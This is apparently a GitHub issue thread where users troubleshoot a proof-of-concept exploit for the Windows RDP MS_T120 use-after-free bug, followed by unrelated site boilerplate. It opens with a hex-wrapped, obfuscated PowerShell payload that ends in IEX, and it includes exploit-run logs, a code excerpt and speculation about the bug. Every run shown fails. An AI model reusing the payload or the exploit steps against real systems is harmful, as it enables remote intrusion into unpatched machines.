344152674232414755416241424c414459416167425041444941545142524147494153514130414859415341426c414538416451413141446b416377427841455141526742744147454156514131414667414e6742584147554159674131414445415551424e414641415a77424a414545416551413541454d415651417941486b414e41426e414867414d674269414445414d41426c41476f416351425841476f41616742554148554155514130414338414f514273414759415451426d41456b415467413241456b415251424d414855416541426b4145674165674251414455414d67424741444d4151774279414851415977424941444d415a41424941473841656742494146594157414235414451415151425141486f415167426b41473841515142444147634165674271414738416567426d414845415241424c414373415a5141724144634161414178414773414f41424341454541535142424146514165414271414734415a414277414534415a51423241456f4163514269414538416241426e4145634157514279414863415951413241446b4162514235414338414d414245414545415577424f4148414159514131414849416477417a41454d415951425a414859416441427a4145774161514277414755416267423241466741574142584144514163774176414859415a414232414459414b77427541484d41535142694146514154674177414451415641425941464541654142594144554163674245414463416141424f414730416341426d414649416467424941446b4164514270414451416267425941486f415567424e41445541617742454146554159514133414849416167424e41464d4164514261414655416367427741464d416177427a41446b4165674261414767415377426a414867415651426a41466f4156774131414863415a514245414845416541424441444d4162774274414755414c774232414663414c7742524145734152674276414645414e77413141466f4155774269414859415651427a414338416277417241446b4162414177414841414f514236414551416377426b414755415a674134414777415551426c41464d414c77424741484541576742484146454164514135414463414e4141764144494157514247414463415377424a41476b4159514276414655416251426d41446b415a41424f4143734165514275414734414c77424a41486b414e774176414534414d774276414573415651425041486f414e774242414463415251427241484d414e674236414841414e41424a414463415677424c414855414d7742534144414155774243414759414e6742454148414156514270414841414e41426b41444d4157674274414759414e514135414841416477417741486f4152674256414745415951427941484141574142544148634154674132414751414f514133414663416341425141446b415541426b414667416241426a414841414d514242414755416177426d414849415677427641476341644142684146554152414279414663416277425641486f415151426a41456b415267426a41454d415a514279414545415167413541474d415177424b4148634162674179414859415a51424d41476741557742734148554162414235414849415551426a414445415577426e41486b414e77424e414738414e77424f414867414d674250414777414b774246414738415751423341456741654141724147344154774235414449415567424f414859416341417a41484d4151674247414549414b77424941486f414f51426c4144414165674231414855415967427441475541596742554147594152514278414849415451427a414767416341413141444d415541424f4146414155674268414855414d774271414577414e674268414767416551423241476341564142694145554165414253414459415767424e414855414f41425a41444d416277417a414559414d414269414859415441423041446b4165514270414859415251413241444d416367425541484d4163414172414645416467425741453041646742534144594152414232414545414e77413041474d415a514278414859415a674135414441415467425041484d414e41425241444d415641425841457741546742534144554152414172414338416351426a414763414d4141324146674155674255414855414e674277414463415a67427441464941596741764148554155414131414567415967427141446b415551424941474d415641425341455141544141324148494164414268414373414d51426b41466f414c774251414859414b77417841466f415577423041456f416441413141466f415a674234414549415951426d414563416251426d414373415467417741486b415a514271414751415441425541476f414d674273414841414d5142304147494162414179414338416567424e4144454152514275414867414f51423241437341575141794147384164514131414841415341423141456f4156674130414849415a41425441444541627742734146554152414250414759415467424941446b415a77426b414667414c77424b4148454162674279414449414b77427141446b414e674176414655414f5142714146494153514259414467415741426b414849416567425a41466b4153514268414859415151413241456b416567426b414841415967425041477341524142424146414153674132414573414d674231414534416167425441484d41597742724148414162774257414373415767426b4144514157414256414655415267426f414863415567425541476f415467413041444d415a77424f414451415477425a41454d415151423241486f4151774233414545415151416941436b414b51413741456b4152514259414341414b41424f41475541647741744145384159674271414755415977423041434141535142504143344155774230414849415a514268414730415567426c414745415a41426c414849414b41424f414755416477417441453841596742714147554159774230414341415351425041433441517742764147304163414279414755416377427a41476b4162774275414334415277423641476b4163414254414851416367426c414745416251416f4143514163774173414673415351425041433441517742764147304163414279414755416377427a41476b416277427541433441517742764147304163414279414755416377427a41476b4162774275414530416277426b414755415851413641446f415241426c41474d4162774274414841416367426c41484d416377417041436b414b514175414649415a5142684147514156414276414555416267426b414367414b51413741413d3d")
Anything wrong?
➜ Documents python3 poc.py -i 172.16.100.200
| _ | | | |/ /
| |) | | _ | ' / ___ ___ _ __
| _ <| | | | |/ _ \ < / _ / _ \ ' | |) | | || | / . \ / / |) |
|/||_,|_|_|__|_| .__/
| |
|_|
[ + ] verifying RDP service on: 172.16.100.200
[ + ] successfully connected to RDP service on host: 172.16.100.200
[ + ] starting RDP connection on 1 targets
[ + ] sending Client MCS Connect Initial PDU request packet -->
[ + ] <-- received 0x70 bytes from host: 172.16.100.200
[ + ] sending Client MCS Domain Request PDU packet -->
[ + ] sending Client MCS Attach User PDU request packet -->
[ + ] <-- received 0xb bytes from host: 172.16.100.200
[ + ] sending MCS Channel Join Request PDU packets -->
[ + ] <-- received 0xf bytes from channel 1001 on host: 172.16.100.200
[ + ] <-- received 0xf bytes from channel 1002 on host: 172.16.100.200
[ + ] <-- received 0xf bytes from channel 1003 on host: 172.16.100.200
[ + ] <-- received 0xf bytes from channel 1004 on host: 172.16.100.200
[ + ] <-- received 0xf bytes from channel 1005 on host: 172.16.100.200
[ + ] <-- received 0xf bytes from channel 1006 on host: 172.16.100.200
[ + ] <-- received 0xf bytes from channel 1007 on host: 172.16.100.200
[ + ] sending Client Security Exhcange PDU packets -->
[ + ] <-- received 0x22 bytes from host: 172.16.100.200
[ + ] sending Client Confirm Active PDU packet -->
[ + ] <-- received 0x1b9 bytes from host: 172.16.100.200
[ + ] sending Client Synchronization PDU packet -->
[ + ] sending Client Control Cooperate PDU packet -->
[ + ] sending Client Control Requesr PDU packet -->
[ + ] sending Client Persistent Key Length PDU packet -->
[ + ] sending Client Font List PDU packet -->
[ + ] sending shell code --->
[ ! ] unable to connect: a bytes-like object is required, not 'str'
Hi,
I always get an error after sending shell code step,
.....
[ + ] sending Client Synchronization PDU packet -->
[ + ] sending Client Control Cooperate PDU packet -->
[ + ] sending Client Control Requesr PDU packet -->
[ + ] sending Client Persistent Key Length PDU packet -->
[ + ] sending Client Font List PDU packet -->
[ + ] sending shell code --->
[ ! ] unable to connect: str() takes at most 1 argument (2 given)
where is the problem?
If i run your script, without editing anything, it give me this error , which mean you have mistake in your code!
@algo7 would u pls show more infomation about u target (x86?x64? win7?)
and the command how u generate the shellcode.
thx~
info("sending MCS Channel Join Request PDU packets -->")
pdus = DoPduConnectionSequence().do_join_request()
for pdu in pdus:
tls.sendall(pdu)
channel_number = int(Packer(pdu).bin_pack()[-4:], 16)
returned_packet = tls.recv(1024)
info("<-- received {} bytes from channel {} on host: {}".format(
hex(len(returned_packet)), channel_number, ip
))
I am unsure if maybe you are the one who wrote this comment or if you just copy and pasted it
but here's the thing saving from sounding like a buzz kill to much,
Whoever stated that # send join requests on ridiculously high channel numbers to trigger the bug
is in my limited knowledge incorrect in their assumption I am if i'm not wrong thinking that maybe you or the other person might not understand the bug correct me if I am
But I think this bug lies in the fact that channel name MS_T120 was an illegal alpha channel name that wasn't whitelisted by the termdd.sys so we are able to create an abritrary channel name that is also using MS_T120 and that when we go to close the original channel because there is an internal reference on channel 31 to the original MS_T120 structure that it will perform the cleanup of the heap etc providing the bytes in the packets are of the right size I thought it was 16 bytes but I am learning ASM so I may be off and the opcode for 32 bit should be 0x2
and to boot we are writing to kernel memory when you are writing to that MS_t120 what I want to know is do you have to close the original channel correctly before the UAF and cause it with your object left in the heap or does it have to do with the first one and alignment of the heap before closing the original channel?
if we do not send the correct bytes it will cause the rce or usaf
What confuses me is like malwaretech said most documentation is for LPE and what not to spray the non paged heap pool and however they are pulling this off is awesome and thank you all for not releasing this exploit the situation is dire and ugly refrain from launching attacks guys try to score a bounty make this into a good thing if anyone does figure this out share it privately with known good guys please never release an exploit for this it makes shadow brokers dropping the eternal blue a cakewalk this is scary shit.
the channel we can create could be any channel number I do not think that we have to use a ridiculously high channel number I believe malware tech used four or 7
I would love for someone like them to sound off I am just trying to piece this together like you are I don;t want to sound like too much of a dick but If i am right people are being misinformed and that's bad.
verifying RDP service on: 10.211.55.21
successfully connected to RDP service on host: 10.211.55.21
starting RDP connection on 1 targets
sending Client MCS Connect Initial PDU request packet -->
<-- received 0x70 bytes from host: 10.211.55.21
sending Client MCS Domain Request PDU packet -->
sending Client MCS Attach User PDU request packet -->
<-- received 0xb bytes from host: 10.211.55.21
sending MCS Channel Join Request PDU packets -->
<-- received 0xf bytes from channel 1001 on host: 10.211.55.21
<-- received 0xf bytes from channel 1002 on host: 10.211.55.21
<-- received 0xf bytes from channel 1003 on host: 10.211.55.21
<-- received 0xf bytes from channel 1004 on host: 10.211.55.21
<-- received 0xf bytes from channel 1005 on host: 10.211.55.21
<-- received 0xf bytes from channel 1006 on host: 10.211.55.21
<-- received 0xf bytes from channel 1007 on host: 10.211.55.21
sending Client Security Exhcange PDU packets -->
<-- received 0x22 bytes from host: 10.211.55.21
sending Client Confirm Active PDU packet -->
<-- received 0x188 bytes from host: 10.211.55.21
sending Client Synchronization PDU packet -->
sending Client Control Cooperate PDU packet -->
unable to connect: (10054, 'WSAECONNRESET')
it always breaked at "sending Client Control Cooperate PDU packet -->"
You can't just random send a encoded powershell command to get rce, this isn't how overflow works.
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.